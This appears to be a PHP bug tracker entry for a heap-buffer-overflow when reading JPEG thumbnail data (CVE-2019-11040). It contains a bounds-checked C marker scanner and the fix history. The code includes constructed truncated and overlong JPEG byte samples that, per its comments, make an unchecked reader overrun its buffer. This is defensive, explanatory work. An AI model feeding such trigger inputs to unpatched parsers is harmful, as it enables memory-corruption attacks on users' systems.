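/* Assumed helper (not PHP's php_jpg_get16): read a big-endian 16-bit value
 * only if two bytes remain at pos. Returns 0 on success, -1 when the field
 * is truncated. Callers keep the invariant pos <= len. */
static int get16_be_checked(const unsigned char *buf, size_t len, size_t pos,
                            uint16_t *out)
{
    if (buf == NULL || pos > len || len - pos < 2)
        return -1;
    *out = (uint16_t)((buf[pos] << 8) | buf[pos + 1]);
    return 0;
}

typedef struct { uint16_t width, height; } thumb_dims;

/* Walk the marker segments of an embedded JPEG thumbnail looking for the
 * SOFn frame header that carries the image dimensions.
 * Returns 1 when dimensions were found, 0 when the data ended cleanly at EOI,
 * and -1 when a marker, length or dimension field would run past `size`. */
static int scan_thumbnail(const unsigned char *data, size_t size, thumb_dims *dims)
{
    size_t pos;

    if (data == NULL || size < 2 || data[0] != 0xFF || data[1] != 0xD8)
        return -1;                       /* not a JPEG (no SOI) */
    pos = 2;

    for (;;) {
        unsigned char marker;
        uint16_t seg_len, w, h;

        if (size - pos < 2)              /* need 0xFF plus the marker byte */
            return -1;
        if (data[pos] != 0xFF)
            return -1;                   /* lost marker sync */
        marker = data[pos + 1];
        pos += 2;

        if (marker == 0xD9)              /* EOI: clean end, no SOF seen */
            return 0;
        if (marker == 0xD8 || marker == 0x01 || (marker >= 0xD0 && marker <= 0xD7))
            continue;                    /* standalone markers carry no length */

        /* The 2-byte length field is exactly where an unchecked 16-bit read
         * overruns a buffer that ends right after the marker byte. */
        if (get16_be_checked(data, size, pos, &seg_len) != 0)
            return -1;
        if (seg_len < 2 || size - pos < seg_len)
            return -1;                   /* length counts itself and must fit */

        if (marker >= 0xC0 && marker <= 0xCF &&
            marker != 0xC4 && marker != 0xC8 && marker != 0xCC) {
            /* SOFn payload: length(2) precision(1) height(2) width(2) ... */
            if (seg_len < 7)
                return -1;
            if (get16_be_checked(data, size, pos + 3, &h) != 0 ||
                get16_be_checked(data, size, pos + 5, &w) != 0)
                return -1;
            dims->height = h;
            dims->width = w;
            return 1;
        }
        pos += seg_len;                  /* skip to the next marker */
    }
}

/* Constructed samples (not the reporter's payload). */

/* SOI, SOF0 marker, then one byte: five bytes in all, the length field is
 * cut in half. An unchecked 16-bit read here touches byte index 5 of a
 * 5-byte buffer, the same shape of overrun the Valgrind trace shows. */
static const unsigned char kTruncated[] = { 0xFF, 0xD8, 0xFF, 0xC0, 0x00 };

/* SOI, SOF0 (length 11, 8-bit, height 16, width 32, one component), EOI. */
static const unsigned char kValid[] = {
    0xFF, 0xD8, 0xFF, 0xC0, 0x00, 0x0B, 0x08, 0x00, 0x10, 0x00, 0x20,
    0x01, 0x01, 0x11, 0x00, 0xFF, 0xD9 };

/* APP1 segment that claims 16 bytes, but the buffer ends after the length. */
static const unsigned char kOverlong[] = { 0xFF, 0xD8, 0xFF, 0xE1, 0x00, 0x10 };

int scan_truncated(void) { thumb_dims d = {0, 0}; return scan_thumbnail(kTruncated, sizeof kTruncated, &d); }
int scan_overlong(void)  { thumb_dims d = {0, 0}; return scan_thumbnail(kOverlong, sizeof kOverlong, &d); }
int scan_valid(thumb_dims *d) { return scan_thumbnail(kValid, sizeof kValid, d); }

int main(void)
{
    thumb_dims d = {0, 0};
    printf("truncated: %d\n", scan_truncated());                           /* -1 */
    printf("overlong:  %d\n", scan_overlong());                            /* -1 */
    printf("valid:     %d (%ux%u)\n", scan_valid(&d), d.width, d.height);  /* 1 (32x16) */
    return 0;
}
```

The check that matters is the one before each 16-bit read: `len - pos < 2` rejects the case where exactly one byte is left, which a test of the form `pos >= len` alone lets through. Keeping `pos <= size` as a loop invariant (every advance is preceded by a check that the bytes exist) is what makes the `size - pos` subtractions safe from wraparound.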
History

 [2019-05-28 00:18 UTC] stas@php.net
-PHP Version: 7.3.5 +PHP Version: 7.1.29 -CVE-ID: +CVE-ID: 2019-11040
 [2019-05-28 00:28 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2019-05-28 00:28 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=73ff4193be24192c894dc0502d06e2b2db35eefb
Log: Fix bug #77988 - heap-buffer-overflow on php_jpg_get16
 [2019-05-28 00:28 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2019-05-28 07:07 UTC] cmb@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b7dc3d9039335b2bfaa1f4ade5d38aec89f25922
Log: Fix bug #77988 - heap-buffer-overflow on php_jpg_get16
 [2019-07-27 15:13 UTC] orestiskourides+php at gmail dot com
-: orestiskourides at gmail dot com +: orestiskourides+php at gmail dot com
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Tue Aug 20 13:01:27 2019 UTC